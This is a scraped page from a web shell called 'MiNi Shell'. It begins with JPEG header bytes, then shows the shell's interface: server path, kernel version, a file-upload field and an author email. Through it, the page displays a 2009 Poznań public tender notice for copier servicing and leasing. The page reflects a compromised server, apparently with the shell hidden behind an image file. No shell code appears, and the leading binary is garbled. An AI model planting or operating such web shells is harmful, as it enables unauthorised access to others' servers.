JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090313/49981-N-2009.html

<p class="kh_header"><b>Poznań: Obsługa konserwacyjno serwisowa oraz dzierżawa kopiarek</b><br>
<b>Numer ogłoszenia: 49981 - 2009; data zamieszczenia: 13.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> POZSERWIS Gospodarstwo Pomocnicze Urzędu Miasta Poznania , pl. Kolegiacki 17, 61-841 Poznań, woj. wielkopolskie, tel. 061 8785434, faks 061 8785215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.city.poznan.pl/bip; www.pozserwis.poznan.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: podsektor samorządowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa konserwacyjno serwisowa oraz dzierżawa kopiarek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1 ( GP.NZP/341-18/09)
Obsługa konserwacyjno-serwisowa 14 sztuk kopiarek niskonakładowych.
Szczegóły niniejszego zamówienia zawarto w projekcie umowy, który wraz z załącznikami stanowi załącznik numer 1A do siwz. 
Planowane jest że w okresie trwania umowy zostanie na nich wykonane do 1.430.000 kopii/wydruków czarno-białych w przeliczeniu na format A4.
Sześć kopiarek jest   objętych gwarancją producenta - szczegóły w załączniku 1A do siwz
Część 2 ( GP.NZP/341-19/09)
Obsługa konserwacyjno-serwisowa 10 sztuk cyfrowych i analogowych kopiarek wysokonakładowych.
Szczegóły niniejszego zamówienia zawarto w projekcie umowy, który wraz z załącznikami stanowi załącznik numer  1B do siwz.
Planowane jest że w okresie trwania umowy zostanie na nich wykonane do 1.700.000 kopii/wydruków czarno-białych w przeliczeniu na format A4.
Kopiarki nie są objęte gwarancją producenta. 
 
Część 3 ( GP.NZP/341-20/09)
Udostępnienie 26 cyfrowych urządzeń kopiujących z możliwością wprowadzenie kodów dostępu.
Planowane jest że w okresie trwania umowy zostanie na nich wykonane nie więcej niż 858.000 sztuk  kopii/wydruków czarno-białych w przeliczeniu na format A4.
Szczegóły niniejszego zamówienia zawarto w projekcie umowy, który wraz z załącznikami stanowi załącznik numer 1C do siwz.
Wymagane warunki techniczne kopiarek przedstawiono w załączniku 1D do siwz..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.31.32.00-4, 30.12.11.20-0, 30.12.14.30-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Dla części 1 - 1500 zł (słownie:  jeden tysiąc złotych)
Dla części 2 - 2000 zł (słownie:  jeden tysiąc złotych)
Dla części 3 - 1000 zł (słownie:  jeden tysiąc złotych)
Termin wniesienia wadium dla wszystkich części upływa dnia 23.03.2009r. o godz. 11:00. Wadium musi obejmować okres związania ofertą tj. do dnia 21.04.2009r.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Do przetargu mogą przystąpić wykonawcy, którzy:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności  będącej przedmiotem niniejszego zamówienia
- odbiór i utylizacja zużytych materiałów eksploatacyjnych realizowany będzie przez firmę posiadającą zezwolenie na prowadzenie działalności w zakresie gospodarki przedmiotowymi odpadami lub wpis do rejestru posiadaczy odpadów  zwolnionych z obowiązku uzyskiwania zezwoleń na prowadzenie działalności w zakresie gospodarki odpadami będącymi przedmiotem niniejszego postępowania albo zatwierdzoną informację o wytwarzanych odpadach i sposobach gospodarowania nimi na podstawie ustawy z dnia  27 kwietnia 2001 r. o odpadach (tekst jedn. z 2007 r. Nr 39, poz. 251 z późn. zm.),
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
Dla części 1
- zrealizowali należycie w okresie 12.03.2006-12.03.2009 (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) minimum 3 zamówienia na usługę konserwacyjno-serwisową kopiarek o wartości jednostkowej nie mniejszej niż 20.000 zł brutto. Jeżeli są to zamówienia okresowe lub ciągłe to mogą być w trakcie realizacji z zastrzeżeniem, że są realizowane należycie przynajmniej od 6 miesięcy.

Dla części 2
- zrealizowali należycie w okresie 12.03.2006-12.03.2009 (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) minimum 3 zamówienia na usługę konserwacyjno-serwisową kopiarek wysokonakładowych o wartości jednostkowej nie mniejszej niż 30.000 zł brutto. Jeżeli są to zamówienia okresowe lub ciągłe to mogą być 
w trakcie realizacji z zastrzeżeniem, że są realizowane należycie przynajmniej od 6 miesięcy. 
Dla części 3
- zrealizowali należycie w okresie 12.03.2006-12.03.2009 (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) minimum 3 zamówienia na dostawę, dzierżawę lub inną formę udostępnienia przez okres nie krótszy niż 6 miesięcy kopiarek cyfrowych o wartości jednostkowej nie mniejszej niż 20.000 zł brutto. Jeżeli są to zamówienia okresowe lub ciągłe to mogą być w trakcie realizacji z zastrzeżeniem, że są realizowane należycie przynajmniej od 6 miesięcy.

c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 

Oceny spełnienia w/w warunków Zamawiający dokona sprawdzając kompletność oraz poprawność złożonych dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2. wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych zamówień w okresie 12.03.06-12.03.09 a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością zamówieniom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania 
i odbiorców oraz załączenia dokumentów potwierdzających, że te zamówienia zostały należycie wykonane . Z załączonych dokumentów musi wprost wynikać, że dotyczą one zamówień uwidocznionych na wykazie - załącznik nr 3 do siwz
3. oświadczenie wykonawcy, że posiada stosowne uprawnienia (zwolnienia)  do odbioru i utylizacji zużytych materiałów eksploatacyjnych lub że zleci to firmie posiadającej takie uprawnienia (zwolnienia)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 50</li>
<li>2 - Parametry techniczne - 50</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.city.poznan.pl/bip; www.pozserwis.poznan.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego w budynku Urzędu Miasta Poznania przy pl. Kolegiackim nr 17 w pokoju nr 64..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2009 godzina 11:00, miejsce: W siedzibie Zamawiającego w budynku Urzędu Miasta Poznania przy pl. Kolegiackim nr 17 w pokoju nr 64..</p><p><b>IV.3.5) Termin związania ofertą:</b> do 21.04.2009.</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt umowy dla części 1 stanowi załącznik numer  1A do siwz
Projekt umowy dla części 2 stanowi załącznik numer  1B do siwz
Projekt umowy dla części 3 stanowi załącznik numer  1C do siwz
Umowa, odrębnie dla każdej z części,  zostanie zawarta w formie pisemnej, w terminie nie krótszym niż 7 dni od dnia przekazania zawiadomienia o wyborze oferty, nie później jednak niż przed upływem terminu związania ofertą. W przypadku gdy w postępowaniu na którąś 
z części  złożona zostanie tylko jedna oferta, umowa dla tej części będzie mogła zostać zawarta przed upływem 7 dni od dnia przekazania zawiadomienia o wyborze oferty.
Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy z zachowaniem następujących warunków:
- Zamawiający zastrzega sobie możliwość zmian porządkowych w umowie, z zastrzeżeniem, 
że nie będą one dotyczyły jej istotnych postanowień w tym m.in.: przedmiotu zamówienia oraz sposobu spełnienia świadczenia, sposobu ustalania i zapłaty wynagrodzenia sposobu i wysokości naliczania kar umownych
- Zamawiający zastrzega sobie możliwość zmiany zakresu realizowanych prac, w taki sposób, że w przypadku wystąpienia okoliczności, których nie można było przewidzieć w chwili zawierania umowy, zakres zostanie umniejszony odpowiednio do zaistniałych okoliczności. Jednocześnie odpowiednio zostanie umniejszone wynagrodzenie wykonawcy.
- Zamawiający zastrzega sobie możliwość zmiany rozmieszczenia kopiarek w budynkach UMP 
z zastrzeżeniem, ze będzie to miejsce zlokalizowane w granicach administracyjnych Miasta Poznania.
- Zamawiający zastrzega sobie możliwość zmiany ( skrócenia)  czasu reakcji serwisu maksymalnie o 20%.
- Zamawiający zastrzega sobie możliwość zmiany (skrócenia)  czasu  na dostarczenia kopiarki zastępczej maksymalnie o 20%..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> GP.NZP/341-18/09.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obsługa konserwacyjno-serwisowa 14 sztuk kopiarek niskonakładowych.
Szczegóły niniejszego zamówienia zawarto w projekcie umowy, który wraz z załącznikami stanowi załącznik numer 1A do siwz. 
Planowane jest że w okresie trwania umowy zostanie na nich wykonane do 1.430.000 kopii/wydruków czarno-białych w przeliczeniu na format A4.
Sześć kopiarek jest   objętych gwarancją producenta - szczegóły w załączniku 1A do siwz.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.32.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> GP.NZP/341-19/09.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obsługa konserwacyjno-serwisowa 10 sztuk cyfrowych i analogowych kopiarek wysokonakładowych.
Szczegóły niniejszego zamówienia zawarto w projekcie umowy, który wraz z załącznikami stanowi załącznik numer  1B do siwz.
Planowane jest że w okresie trwania umowy zostanie na nich wykonane do 1.700.000 kopii/wydruków czarno-białych w przeliczeniu na format A4.
Kopiarki nie są objęte gwarancją producenta..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.32.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> GP.NZP/341-20/09.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Udostępnienie 26 cyfrowych urządzeń kopiujących z możliwością wprowadzenie kodów dostępu.
Planowane jest że w okresie trwania umowy zostanie na nich wykonane nie więcej niż 858.000 sztuk  kopii/wydruków czarno-białych w przeliczeniu na format A4.
Szczegóły niniejszego zamówienia zawarto w projekcie umowy, który wraz z załącznikami stanowi załącznik numer 1C do siwz.
Wymagane warunki techniczne kopiarek przedstawiono w załączniku 1D do siwz..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.11.20-0, 30.12.14.30-6, 50.31.32.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. parametry techniczne - 50</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com